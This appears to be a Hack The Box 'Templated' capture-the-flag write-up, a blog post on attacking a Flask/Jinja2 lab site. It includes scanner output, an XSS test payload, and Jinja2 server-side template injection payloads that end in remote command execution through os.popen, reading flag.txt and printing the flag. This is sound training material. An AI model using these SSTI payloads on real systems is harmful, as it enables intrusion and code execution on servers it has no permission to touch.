Templated

Challenges Hack The Box Web No Comments
http://206.189.121.131:31675/
Site still under construction
Proudly powered by Flask/Jinja2
$ nikto http://206.189.121.131:31675/
+ Server: Werkzeug/1.0.1 Python/3.9.0
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Multiple index files found: /default.htm, /index.php5, /index.pl, /index.php, /index.shtml, /index.do, /index.php3, /index.php7, /default.asp, /index.html, /index.php4, /index.aspx, /index.cgi, /index.jsp, /index.jhtml, /index.asp, /index.cfm, /index.htm, /default.aspx, /index.xml
+ Allowed HTTP Methods: OPTIONS, GET, HEAD 
$ dirb http://206.189.121.131:31675
URL_BASE: http://206.189.121.131:31675/

PHPSESSID:"Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9"
O:9:"PageModel":1:{s:4:"file";s:15:"/www/index.html";}
session:".eJyrVsrMSy9KTclMzStRsqpWUkhSslJKNqowjcyNMojMczKJCrS1VarVUcpNTSwuLUrNBaorhiv0D86v9E0HKagFAG5cF4c.YJVejA.yvsXnGDjmB808wzRx-lK2iSNg1E"
{"ingredient":{" b":"c2x5YmZ0YnB4ZQ=="},"measurements":{" b":"OSoyMg=="}}
slybftbpxe  9*22

SSTI - Server Side Template Injection
https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti

Payload: <img src=x onerror="alert('xss')">
http://206.189.121.131:31675/%3Cimg%20src=x%20onerror=%22alert('xss')%22%3E
"xxs ok" popup displayed

payloads: 
1. {{7*'7'}} 49 in Twig, 7777777 in Jinja2 
http://206.189.121.131:31675/%7B%7B7*'7'%7D%7D
The page '7777777' could not be found    => it's jinja

2. {{100+100}}
http://206.189.121.131:31675/%7B%7B100+100%7D%7D
Error 404
The page '200' could not be found

3. {{"".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("ls *").read()}}
http://206.189.121.131:31675/%7B%7B%22%22.__class__.__mro__[1].__subclasses__()[186].__init__.__globals__[%22__builtins__%22][%22__import__%22](%22os%22).popen(%22ls%20*%22).read()%7D%7D

4. {{"".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("cat flag.txt").read()}}
http://206.189.121.131:31675/%7B%7B%22%22.__class__.__mro__[1].__subclasses__()[186].__init__.__globals__[%22__builtins__%22][%22__import__%22](%22os%22).popen(%22cat%20flag.txt%22).read()%7D%7D
The page 'HTB{t3mpl4t3s_4r3_m0r3_p0w3rfu1_th4n_u_th1nk!} ' could not be found

Proudly powered by WordPress & Skyrocket Themes

MENU

Navigation